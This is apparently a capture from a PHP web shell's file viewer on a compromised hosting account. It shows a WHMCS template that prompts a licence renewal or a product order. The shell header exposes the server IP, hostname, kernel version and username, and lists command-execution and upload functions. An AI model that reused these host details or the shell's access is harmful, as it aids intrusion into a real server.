Server IP : 213.176.29.180  /  Your IP : 3.14.130.58
Web Server : Apache
System : Linux 213.176.29.180.hostiran.name 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
User : webtaragh ( 1001)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home/webtaragh/public_html/whmcs/templates/twenty-one/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/webtaragh/public_html/whmcs/templates/twenty-one/downloaddenied.tpl
{if $reason eq "supportandupdates"}

    {include file="$template/includes/alert.tpl" type="error" msg="{lang key='supportAndUpdatesExpiredLicense'}{if $licensekey}: {$licensekey}{else}.{/if}" textcenter=true}

{/if}

<div class="card">
    <div class="card-body">
        {if $reason eq "supportandupdates"}

            <p>{lang key='supportAndUpdatesRenewalRequired'}</p>

            <form action="{$systemsslurl}cart.php?a=add" method="post">
                <input type="hidden" name="productid" value="{$serviceid}" />
                <input type="hidden" name="aid" value="{$addonid}" />
                <div class="text-center">
                    <button type="submit" class="btn btn-default">
                        {lang key='supportAndUpdatesClickHereToRenew'} &raquo;
                    </button>
                </div>
            </form>

        {else}

            <p>{lang key='downloadproductrequired'}</p>

            {if $prodname}
                {include file="$template/includes/alert.tpl" type="info" msg=$prodname textcenter=true}
            {else}
                {include file="$template/includes/alert.tpl" type="info" msg=$addonname textcenter=true}
            {/if}

            {if $pid || $aid}
                <form action="{$systemsslurl}cart.php" method="post">
                    {if $pid}
                        <input type="hidden" name="a" value="add" />
                        <input type="hidden" name="pid" value="{$pid}" />
                    {elseif $aid}
                        <input type="hidden" name="gid" value="addons" />
                    {/if}
                    <div class="text-center">
                        <button type="submit" class="btn btn-default">
                            {lang key='ordernowbutton'} &raquo;
                        </button>
                    </div>
                </form>
            {/if}

        {/if}
    </div>
</div>